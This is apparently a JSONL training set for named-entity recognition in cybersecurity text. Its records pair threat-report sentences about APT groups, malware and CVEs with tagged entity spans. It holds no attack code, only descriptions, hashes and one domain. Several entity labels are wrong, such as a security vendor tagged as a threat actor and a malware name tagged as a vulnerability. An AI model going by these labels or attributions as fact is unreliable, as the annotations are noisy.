{"text": "The company uses a type of software from Adups that 's nicknamed FOTA , short for firmware over-the-air . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . Invader : 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb . 9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e . 9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe . 9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831 .", "spans": {"ORGANIZATION: Adups": [[41, 46]], "SYSTEM: FOTA": [[65, 69]], "ORGANIZATION: Rapid7": [[106, 112]], "MALWARE: Invader": [[211, 218]], "FILEPATH: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[221, 285]], "FILEPATH: 9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e": [[288, 363]], "FILEPATH: 9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe": [[366, 441]], "FILEPATH: 9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831": [[444, 519]]}, "info": {"id": "cyberner_stix_train_004733", "source": "cyberner_stix_train"}}
{"text": "Mobile implant evolution timeline However , some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection . These APT attacks and adopting confrontation measures will exist for a long time . Though both this group and Winnti Group use the malware Winnti , the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting .", "spans": {"THREAT_ACTOR: APT": [[171, 174]], "ORGANIZATION: adopting confrontation measures": [[187, 218]], "THREAT_ACTOR: Winnti": [[275, 281]], "MALWARE: Winnti": [[304, 310]]}, "info": {"id": "cyberner_stix_train_004734", "source": "cyberner_stix_train"}}
{"text": "- SpyNote RAT was also collecting the device ’ s location to identify the exact location of the victim . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"MALWARE: SpyNote RAT": [[2, 13]], "THREAT_ACTOR: Silence:": [[124, 132]], "THREAT_ACTOR: Silence": [[167, 174]], "THREAT_ACTOR: Cobalt": [[249, 255]], "ORGANIZATION: financial institutions": [[406, 428]]}, "info": {"id": "cyberner_stix_train_004735", "source": "cyberner_stix_train"}}
{"text": "While it can be used anywhere and target any bank or region , at this time , we are seeing it deployed specifically in Germany . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation .", "spans": {"VULNERABILITY: CVE-2017-11882": [[195, 209]], "MALWARE: 'NavShExt.dll'": [[276, 290]], "MALWARE: iexplore.exe": [[321, 333]], "THREAT_ACTOR: OilRig group": [[472, 484]], "MALWARE: QUADAGENT samples": [[494, 511]], "MALWARE: Invoke-Obfuscation": [[574, 592]]}, "info": {"id": "cyberner_stix_train_004736", "source": "cyberner_stix_train"}}
{"text": "This means that the only thing possible in this case is to replace its DEX file . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants . Later , Windows Defender Antivirus was added to the checklist . In fact , this chain also leads to NetSupport RAT .", "spans": {"TOOL: SMBs": [[150, 154]], "ORGANIZATION: accountants": [[192, 203]], "TOOL: Windows Defender Antivirus": [[214, 240]], "TOOL: NetSupport RAT": [[305, 319]]}, "info": {"id": "cyberner_stix_train_004737", "source": "cyberner_stix_train"}}
{"text": "So far , researchers have seen around 100 victims of Slingshot and its related modules , located in Kenya , Yemen , Afghanistan , Libya , Congo , Jordan , Turkey , Iraq , Sudan , Somalia and Tanzania . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel .", "spans": {"TOOL: Slingshot": [[53, 62]], "THREAT_ACTOR: LYCEUM’s": [[237, 245]], "ORGANIZATION: executives": [[259, 269]], "ORGANIZATION: HR staff": [[272, 280]], "ORGANIZATION: IT personnel": [[287, 299]]}, "info": {"id": "cyberner_stix_train_004738", "source": "cyberner_stix_train"}}
{"text": "This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors .", "spans": {}, "info": {"id": "cyberner_stix_train_004739", "source": "cyberner_stix_train"}}
{"text": "However , this scenario is highly unlikely .", "spans": {}, "info": {"id": "cyberner_stix_train_004740", "source": "cyberner_stix_train"}}
{"text": "Gaza Cybergang Group 3: This group is believed to be behind Operation Parliament .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]]}, "info": {"id": "cyberner_stix_train_004741", "source": "cyberner_stix_train"}}
{"text": "] net app store showing the current DroidVPN app Virtual Private Network ( VPN ) tools allow connections to remote private networks , increasing the security and privacy of the user ’ s communications . These campaign-related VPSs are located in South Africa . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE .", "spans": {"THREAT_ACTOR: VPSs": [[226, 230]], "ORGANIZATION: Arbor": [[286, 291]], "ORGANIZATION: FireEye": [[304, 311]], "THREAT_ACTOR: APT12": [[325, 330]], "MALWARE: HIGHTIDE": [[368, 376]]}, "info": {"id": "cyberner_stix_train_004742", "source": "cyberner_stix_train"}}
{"text": "] com www5.zyns [ . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": {"THREAT_ACTOR: APT41": [[20, 25]]}, "info": {"id": "cyberner_stix_train_004743", "source": "cyberner_stix_train"}}
{"text": "SHA256 Package Name App Name First Seen 07994c9f2eeeede199dd6b4e760fce3 71f03f3cc4307e6551c18d2fbd024a24f com.android.henbox 备份 ( Backup ) January 3rd 2018 Table 6 contains an updated list of targeted apps from which this newer variant of HenBox is capable of harvesting data . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"MALWARE: HenBox": [[239, 245]], "TOOL: HIGHNOON.CLI": [[319, 331]], "TOOL: GEARSHIFT": [[336, 345]], "THREAT_ACTOR: APT17": [[366, 371]], "THREAT_ACTOR: group": [[412, 417]], "THREAT_ACTOR: Dukes": [[424, 429]]}, "info": {"id": "cyberner_stix_train_004744", "source": "cyberner_stix_train"}}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "THREAT_ACTOR: Lazarus group": [[110, 123]], "TOOL: emails": [[173, 179]], "ORGANIZATION: job recruiters": [[194, 208]]}, "info": {"id": "cyberner_stix_train_004745", "source": "cyberner_stix_train"}}
{"text": "The group did change the contents of the spear-phishing emails they sent , but they didn’t switch to a new email format ; instead , they reverted to the same efaxthemed format that they had previously employed , even to the point of reusing the exact same decoy document that they had used in the CozyDuke campaign a year earlier ( July 2014 ) .", "spans": {"TOOL: emails": [[56, 62]], "TOOL: email": [[107, 112]], "MALWARE: CozyDuke": [[297, 305]]}, "info": {"id": "cyberner_stix_train_004746", "source": "cyberner_stix_train"}}
{"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file .", "spans": {"ORGANIZATION: SOC personnel": [[36, 49]], "ORGANIZATION: CTU": [[303, 306]], "MALWARE: PDF file": [[342, 350]], "MALWARE: HTTPBrowser installer": [[417, 438]]}, "info": {"id": "cyberner_stix_train_004747", "source": "cyberner_stix_train"}}
{"text": "Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . Over the summer they compromised several sites , including a well-known Uyghur website written in that native language .", "spans": {"VULNERABILITY: Flash exploits": [[11, 25]], "VULNERABILITY: Java zero-day": [[95, 108]], "ORGANIZATION: Kaspersky Lab": [[168, 181]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[194, 222]]}, "info": {"id": "cyberner_stix_train_004748", "source": "cyberner_stix_train"}}
{"text": "In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more . ined in the archive is called DriverInstallerU.exe” but its metadata shows that its original name is Interenet Assistant.exe” .", "spans": {"THREAT_ACTOR: Shun Wang": [[12, 21]], "FILEPATH: DriverInstallerU.exe”": [[156, 177]], "FILEPATH: Interenet Assistant.exe”": [[227, 251]]}, "info": {"id": "cyberner_stix_train_004749", "source": "cyberner_stix_train"}}
{"text": "Initial victim communication with the INDRIK SPIDER operator , using one of the email addresses provided , results in the operator providing key pieces of information up front , such as the BTC address and the ransom amount . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[38, 51]]}, "info": {"id": "cyberner_stix_train_004750", "source": "cyberner_stix_train"}}
{"text": "In recent years , some malicious Android applications abused these accessibility services in various attack scenarios . The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates .", "spans": {"SYSTEM: Android": [[33, 40]], "THREAT_ACTOR: group": [[139, 144]], "TOOL: CCleaner": [[180, 188]], "THREAT_ACTOR: OilRig group": [[269, 281]], "ORGANIZATION: government": [[368, 378]]}, "info": {"id": "cyberner_stix_train_004751", "source": "cyberner_stix_train"}}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Once the docx file included in the phishing email is clicked , a warning window will pop up .", "spans": {"MALWARE: Mimikatz": [[0, 8]]}, "info": {"id": "cyberner_stix_train_004752", "source": "cyberner_stix_train"}}
{"text": "Conclusion Due to the ubiquitous nature of mobile devices and the widespread use of Android , it is very easy for attackers to victimize Android users . Today , this malware is still actively being used against the Philippines . APT18 : TG-0416 , Dynamite Panda , Threat Group-0416 .", "spans": {"SYSTEM: Android": [[84, 91], [137, 144]], "MALWARE: malware": [[166, 173]], "THREAT_ACTOR: APT18": [[229, 234]], "THREAT_ACTOR: TG-0416": [[237, 244]], "THREAT_ACTOR: Dynamite Panda": [[247, 261]], "THREAT_ACTOR: Threat Group-0416": [[264, 281]]}, "info": {"id": "cyberner_stix_train_004753", "source": "cyberner_stix_train"}}
{"text": "The OceanLotus , an APT group said to have a Vietnamese background , was first exposed and named by QiAnXin in May 2015 . The DeepSight Managed Adversary and Threat Intelligence team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug ( aka Turla ) Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . While reviewing a 2015 report⁵ of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti⁶ samples designed specifically for Linux⁷ . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . We will see more from Zebrocy into 2019 on government and military related organizations . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Kaspersky reveals that APT33 is a capable group that has carried out Cyber Espionage operations since at least 2013 . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The Cyber Espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing , consumer products , and hospitality sectors . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . FireEye assesses that APT32 is a Cyber Espionage group aligned with Vietnamese government interests . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . APT10 is a Chinese Cyber Espionage group that FireEye has tracked since 2009 . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": {"THREAT_ACTOR: OceanLotus": [[4, 14]], "ORGANIZATION: QiAnXin": [[100, 107]], "ORGANIZATION: DeepSight Managed Adversary": [[126, 153]], "ORGANIZATION: Threat Intelligence": [[158, 177]], "THREAT_ACTOR: Waterbug": [[325, 333], [605, 613]], "THREAT_ACTOR: Turla": [[340, 345]], "ORGANIZATION: DeepSight MATI team": [[446, 465]], "THREAT_ACTOR: Winnti": [[744, 750], [996, 1002]], "ORGANIZATION: Vietnamese gaming company": [[766, 791]], "THREAT_ACTOR: Winnti⁶": [[827, 834]], "ORGANIZATION: Chronicle": [[904, 913]], "MALWARE: Azazel": [[1039, 1045]], "THREAT_ACTOR: Winnti developers": [[1053, 1070]], "THREAT_ACTOR: Zebrocy": [[1205, 1212], [1375, 1382]], "VULNERABILITY: 0day": [[1337, 1341]], "VULNERABILITY: exploits": [[1342, 1350]], "ORGANIZATION: government": [[1396, 1406], [3617, 3627]], "ORGANIZATION: military": [[1411, 1419]], "MALWARE: PowerShell script": [[1448, 1465]], "FILEPATH: malicious DLL files": [[1525, 1544]], "THREAT_ACTOR: Silence": [[1587, 1594]], "MALWARE: Perl IRC bot": [[1628, 1640]], "MALWARE: public IRC": [[1645, 1655]], "ORGANIZATION: FBI": [[1688, 1691]], "THREAT_ACTOR: APT6": [[1744, 1748]], "ORGANIZATION: US government": [[1761, 1774]], "ORGANIZATION: \bFireEye iSIGHT": [[1849, 1864]], "THREAT_ACTOR: APT37": [[1892, 1897]], "THREAT_ACTOR: Scarcruft": [[1948, 1957]], "THREAT_ACTOR: Group123": [[1962, 1970]], "ORGANIZATION: \bTrend Micro": [[1973, 1985]], "THREAT_ACTOR: MuddyWater": [[2014, 2024]], "THREAT_ACTOR: actor": [[2041, 2046]], "ORGANIZATION: \bFireEye": [[2094, 2102]], "THREAT_ACTOR: actors": [[2119, 2125]], "TOOL: Flash": [[2148, 2153], [4721, 4726]], "THREAT_ACTOR: TEMP.Reaper": [[2210, 2221]], "ORGANIZATION: FireEye": [[2224, 2231], [2371, 2378], [3140, 3147], [3221, 3228], [3381, 3388], [3538, 3545], [3663, 3670], [4277, 4284], [4434, 4441]], "THREAT_ACTOR: TEMP.Hermit": [[2296, 2307]], "THREAT_ACTOR: APT34": [[2388, 2393]], "VULNERABILITY: exploit": [[2403, 2410]], "ORGANIZATION: Microsoft": [[2419, 2428], [4650, 4659]], "VULNERABILITY: vulnerability": [[2436, 2449]], "ORGANIZATION: government organization": [[2462, 2485]], "ORGANIZATION: Kaspersky": [[2507, 2516], [2654, 2663], [3040, 3049]], "THREAT_ACTOR: APT33": [[2530, 2535], [2625, 2630]], "MALWARE: DROPSHOT dropper": [[2685, 2701]], "THREAT_ACTOR: APT32": [[2730, 2735], [2819, 2824], [3242, 3247], [3519, 3524], [3560, 3565]], "MALWARE: backdoors": [[2761, 2770]], "MALWARE: scripts": [[2775, 2782]], "ORGANIZATION: Mandiant": [[2898, 2906], [3492, 3500]], "THREAT_ACTOR: FIN7": [[3020, 3024]], "THREAT_ACTOR: Carbanak": [[3112, 3120]], "ORGANIZATION: Vietnam’s manufacturing": [[3305, 3328]], "ORGANIZATION: consumer products": [[3331, 3348]], "ORGANIZATION: hospitality": [[3355, 3366]], "ORGANIZATION: iSIGHT": [[3389, 3395]], "ORGANIZATION: Vietnamese": [[3606, 3616]], "THREAT_ACTOR: APT19": [[3705, 3710]], "ORGANIZATION: Chinese government": [[3804, 3822]], "THREAT_ACTOR: APT10": [[3825, 3830], [3980, 3985]], "THREAT_ACTOR: FireEye": [[3871, 3878]], "ORGANIZATION: FireEye ISIGHT Intelligence": [[3939, 3966]], "ORGANIZATION: FireEye’s": [[4039, 4048]], "THREAT_ACTOR: APT28": [[4083, 4088], [4310, 4315], [4708, 4713]], "ORGANIZATION: Russian government": [[4114, 4132]], "THREAT_ACTOR: APT30": [[4477, 4482]], "ORGANIZATION: FireEye iSIGHT": [[4524, 4538]], "THREAT_ACTOR: Vendetta Brothers": [[4619, 4636]], "ORGANIZATION: Google": [[4639, 4645]], "VULNERABILITY: CVE-2016-7855": [[4741, 4754]]}, "info": {"id": "cyberner_stix_train_004754", "source": "cyberner_stix_train"}}
{"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "ORGANIZATION: financially": [[10, 21]], "ORGANIZATION: Microsoft Analytics": [[131, 150]], "MALWARE: Winnti": [[162, 168]]}, "info": {"id": "cyberner_stix_train_004755", "source": "cyberner_stix_train"}}
{"text": "In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": {"THREAT_ACTOR: LEAD": [[22, 26]], "TOOL: remote access login credentials": [[69, 100]], "TOOL: SQL injection": [[114, 127]], "TOOL: web servers": [[154, 165]], "MALWARE: Winnti": [[191, 197]]}, "info": {"id": "cyberner_stix_train_004756", "source": "cyberner_stix_train"}}
{"text": "WAKE_LOCK - prevent the processor from sleeping and dimming the screen . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years .", "spans": {"MALWARE: wuaupdt.exe": [[130, 141]], "MALWARE: Emissary": [[288, 296]], "THREAT_ACTOR: actors": [[343, 349]]}, "info": {"id": "cyberner_stix_train_004757", "source": "cyberner_stix_train"}}
{"text": "One of India 's largest financial organizations A large e-commerce company The e-commerce company 's primary shipping vendor One of India 's top five IT firms A United States healthcare provider 's Indian business unit Two government organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004758", "source": "cyberner_stix_train"}}
{"text": "] net – C & C servers NG SuperShell – string from the reverse shell payload ngg – prefix in commands names of the implant for Windows Signature with specific issuer Whois records and IP relationships provide many interesting insights as well . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": {"SYSTEM: Windows": [[126, 133]], "MALWARE: XAgent": [[258, 264]], "MALWARE: IOS_XAGENT.A": [[277, 289]], "MALWARE: MadCap": [[349, 355]], "MALWARE: XAGENT.B": [[373, 381]], "MALWARE: LOWBALL": [[393, 400]], "MALWARE: malware": [[401, 408]], "TOOL: Dropbox": [[427, 434]], "THREAT_ACTOR: admin@338": [[449, 458]], "FILEPATH: upload.bat": [[485, 495]]}, "info": {"id": "cyberner_stix_train_004759", "source": "cyberner_stix_train"}}
{"text": "The supposed purpose of that app is to obtain and use a required “ security code ” to log in to their online banking site . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . However , the attack on January 16 did not involve ThreeDollars at all .", "spans": {"MALWARE: Mimikatz": [[124, 132]], "MALWARE: ThreeDollars": [[280, 292]]}, "info": {"id": "cyberner_stix_train_004760", "source": "cyberner_stix_train"}}
{"text": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus , also dubbed APT32 and APT-C-00 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "TOOL: malicious toolkit": [[68, 85]], "THREAT_ACTOR: OceanLotus": [[141, 151]], "THREAT_ACTOR: APT32": [[166, 171]], "THREAT_ACTOR: APT-C-00": [[176, 184]], "FILEPATH: CARBANAK": [[267, 275]]}, "info": {"id": "cyberner_stix_train_004761", "source": "cyberner_stix_train"}}
{"text": "These events can be based on time , charging or battery status , location , connectivity , running apps , focused app , SIM card status , SMS received with keywords , and screen turning on . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . Once the opaque predicates are broken , Sandworm was first observed in the victim ’s environment in June 2022 , when the actor deployed the Neo - REGEORG webshell on an internet - facing server .", "spans": {"THREAT_ACTOR: threat groups": [[403, 416]], "THREAT_ACTOR: OilRig": [[427, 433]], "THREAT_ACTOR: CopyKittens": [[438, 449]], "THREAT_ACTOR: Sandworm": [[492, 500]], "TOOL: Neo - REGEORG": [[592, 605]], "SYSTEM: internet - facing server": [[621, 645]]}, "info": {"id": "cyberner_stix_train_004762", "source": "cyberner_stix_train"}}
{"text": "Today this malware shows unwanted ads , tomorrow it could steal sensitive information ; from private messages to banking credentials and much more . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis . By checking the sender information , it ’s possible to determine whether the company actually exists . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": {"ORGANIZATION: Apple": [[421, 426]], "VULNERABILITY: exploited vulnerability": [[511, 534]], "ORGANIZATION: WebKit": [[538, 544]]}, "info": {"id": "cyberner_stix_train_004763", "source": "cyberner_stix_train"}}
{"text": "We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools .", "spans": {"THREAT_ACTOR: APT41": [[16, 21]], "THREAT_ACTOR: EvilGnome": [[263, 272]], "MALWARE: SFX": [[294, 297]], "FILEPATH: Windows tools": [[412, 425]]}, "info": {"id": "cyberner_stix_train_004764", "source": "cyberner_stix_train"}}
{"text": "At that time , the actor used a fake website : wfcwallet.com .", "spans": {"DOMAIN: wfcwallet.com": [[47, 60]]}, "info": {"id": "cyberner_stix_train_004765", "source": "cyberner_stix_train"}}
{"text": "Shifu is relatively common in Japan but was a new addition to TA505 ’s toolbox .", "spans": {"MALWARE: Shifu": [[0, 5]], "THREAT_ACTOR: TA505": [[62, 67]]}, "info": {"id": "cyberner_stix_train_004766", "source": "cyberner_stix_train"}}
{"text": "This discovery indicates the actor ’ s ambition in expanding operations into Google Play store with previous success experience from the main “ Agent Smith ” campaign . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . RevengeHotels : cybercrime targeting hotel front desks worldwide . Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties ?", "spans": {"SYSTEM: Google Play": [[77, 88]], "MALWARE: Agent Smith": [[144, 155]], "MALWARE: Android version": [[173, 188]], "THREAT_ACTOR: RevengeHotels": [[291, 304]]}, "info": {"id": "cyberner_stix_train_004767", "source": "cyberner_stix_train"}}
{"text": "Dridex operations became more targeted , resulting in less distribution and Dridex sub-botnets in operation , and BitPaymer ransomware operations began in July 2017 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {"TOOL: Dridex": [[0, 6], [76, 82]], "TOOL: BitPaymer ransomware": [[114, 134]], "ORGANIZATION: Cisco Talos": [[167, 178]]}, "info": {"id": "cyberner_stix_train_004768", "source": "cyberner_stix_train"}}
{"text": "Scarlet Mimic also uses the infamous HTRAN tool on at least some of their C2 servers . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[0, 13]], "TOOL: HTRAN tool": [[37, 47]], "ORGANIZATION: social media": [[123, 135]], "ORGANIZATION: employees": [[166, 175]]}, "info": {"id": "cyberner_stix_train_004769", "source": "cyberner_stix_train"}}
{"text": "Based on emails leaked in the dump , a number of Czech firms appear to be in business with the Hacking team , including a major IT partner in the Olympic Games . Sensitive bank documents have be found on the servers that were controlling Carbanak . with an immediate value . In most cases , the file is an Excel spreadsheet containing a VBA macro , but we also found four instances where a malicious PowerPoint OLE2 ( PPT ) file was used , possibly indicating the actor 's readiness to use file formats less commonly used in attacks .", "spans": {"VULNERABILITY: Carbanak": [[238, 246]], "MALWARE: malicious PowerPoint OLE2 ( PPT )": [[390, 423]]}, "info": {"id": "cyberner_stix_train_004770", "source": "cyberner_stix_train"}}
{"text": "In addition , FANCY BEAR ’s X-Tunnel network tunneling tool , which facilitates connections to NAT-ed environments , was used to also execute remote commands .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[14, 24]], "TOOL: X-Tunnel": [[28, 36]], "TOOL: NAT-ed": [[95, 101]]}, "info": {"id": "cyberner_stix_train_004771", "source": "cyberner_stix_train"}}
{"text": "The emails then contained an attachment that was either an executable that appeared to be a text file based on the file name and icon , or a password-protected archive containing an executable file with the password provided in the email .", "spans": {"TOOL: emails": [[4, 10]], "TOOL: email": [[232, 237]]}, "info": {"id": "cyberner_stix_train_004772", "source": "cyberner_stix_train"}}
{"text": "These apps would remain available on the Play Store for months and would eventually be re-uploaded . The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates . The remaining commands send feedback by posting data into Google Forms . There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia ’s Ministry of Defense and NTC Vulkan .", "spans": {"SYSTEM: Play Store": [[41, 51]], "THREAT_ACTOR: OilRig group": [[105, 117]], "ORGANIZATION: government": [[204, 214]], "TOOL: Google Forms": [[303, 315]], "THREAT_ACTOR: nation - state actors": [[350, 371]], "THREAT_ACTOR: Russia ’s Ministry of Defense": [[475, 504]], "THREAT_ACTOR: NTC Vulkan": [[509, 519]]}, "info": {"id": "cyberner_stix_train_004773", "source": "cyberner_stix_train"}}
{"text": "Failed login activity can be indicative of failed intrusion activity .", "spans": {}, "info": {"id": "cyberner_stix_train_004774", "source": "cyberner_stix_train"}}
{"text": "Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "VULNERABILITY: SMB vulnerabilities": [[124, 143]], "ORGANIZATION: Microsoft": [[157, 166]], "MALWARE: WhiteBear": [[200, 209]], "TOOL: C2": [[302, 304]]}, "info": {"id": "cyberner_stix_train_004775", "source": "cyberner_stix_train"}}
{"text": "This implies they have made considerable investments . the US had data stolen by members of Emissary Panda . This means that the function responsible for decrypting and executing the payload is executed directly after the load of the malicious DLL . LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": {"THREAT_ACTOR: Emissary Panda": [[92, 106]], "TOOL: DLL": [[244, 247]], "TOOL: LIGHTWORK": [[250, 259]], "TOOL: IEC-104": [[334, 341]]}, "info": {"id": "cyberner_stix_train_004776", "source": "cyberner_stix_train"}}
